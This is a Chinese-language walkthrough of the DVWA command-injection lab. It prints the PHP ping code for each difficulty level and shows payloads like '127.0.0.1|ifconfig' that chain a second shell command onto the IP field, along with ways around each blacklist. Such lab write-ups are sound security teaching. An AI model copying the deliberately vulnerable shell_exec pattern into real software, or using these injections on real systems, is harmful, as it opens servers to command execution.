Command Injection

命令注入

Low

源码解析

使用 $_REQUEST 获取 HTTP POST 请求提交的数据,未对其进行检查和过滤直接拼接到 ping 命令中。

shell_exec 用于通过 shell 环境执行指令,并将输出结果以字符串的形式返回。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php

if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$target = $_REQUEST[ 'ip' ];

// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}

// Feedback for the end user
echo "<pre>{$cmd}</pre>";
}

?>

漏洞利用

shell 环境中用于拼接命令的符号有以下几个:

符号 | 说明

  • | -
    & | 前一条命令在后台运行
    && | 当且仅当前一条命令执行成功后执行下一条命令
    \|\| | 当且仅当前一条命令执行失败后执行下一条命令
    \| | 将前一条命令的标准输出(stdout)作为下一条命令的输入
    ; | 无论前一条指令是否执行成功,都执行下一条指令
1
2
3
4
5
# ping 127.0.0.1 成功,继续执行 ifconfig
127.0.0.1&&ifconfig

# 执行 ping 127.0.0.1 后继续执行 ifconfig
127.0.0.1;ifconfig
1
2
3
4
5
# ping a.b.c.d 失败,继续执行 ifconfig
a.b.c.d||ifconfig

# ifconfig 不接受输入
127.0.0.1|ifconfig
1
2
# ping 127.0.0.1 后台结束后返回
127.0.0.1&ifconfig

参阅

Medium

源码解析

在 Low 的基础上使用 str_replace 过滤符号 &&;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php

if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$target = $_REQUEST[ 'ip' ];

// Set blacklist
$substitutions = array(
'&&' => '',
';' => '',
);

// Remove any of the charactars in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );

// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}

// Feedback for the end user
echo "<pre>{$cmd}</pre>";
}

?>

漏洞利用

|||& 仍然可以使用,此外还可以使用 &&&&;& 等,过滤后就变为 &&&,同样可以实现漏洞利用。

1
2
3
4
5
6
7
8
# ping a.b.c.d 失败,继续执行 ifconfig
a.b.c.d||ifconfig

# ifconfig 不接受输入
127.0.0.1|ifconfig

# ping 127.0.0.1 后台结束后返回
127.0.0.1&ifconfig

参阅

High

源码解析

使用 trim 去除字符串首尾的空白字符,然后又过滤了许多符号,但是没有过滤 | ,显然可以利用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php

if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$target = trim($_REQUEST[ 'ip' ]);

// Set blacklist
$substitutions = array(
'&' => '',
';' => '',
'| ' => '', // <-- 这个有空格
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);

// Remove any of the charactars in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );

// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}

// Feedback for the end user
echo "<pre>{$cmd}</pre>";
}

?>

漏洞利用

使用管道符 | 即可。

1
127.0.0.1|ifconfig

参阅

Impossioble

源码解析

使用 Anti-CSRF Token 来避免 CSRF 攻击,提交数据后先对 token 进行检查;然后使用 stripslashes 对提交的数据进行反转义,并用 explode 分割 ip 地址,再用 is_numeric 确保分割的每个部分都是数字,且只包含 4 个部分;最后拼接后再执行指令。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php

if( isset( $_POST[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

// Get input
$target = $_REQUEST[ 'ip' ];
$target = stripslashes( $target );

// Split the IP into 4 octects
$octet = explode( ".", $target );

// Check IF each octet is an integer
if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
// If all 4 octets are int's put the IP back together.
$target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];

// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}

// Feedback for the end user
echo "<pre>{$cmd}</pre>";
}
else {
// Ops. Let the user name theres a mistake
echo '<pre>ERROR: You have entered an invalid IP.</pre>';
}
}

// Generate Anti-CSRF token
generateSessionToken();

?>

参阅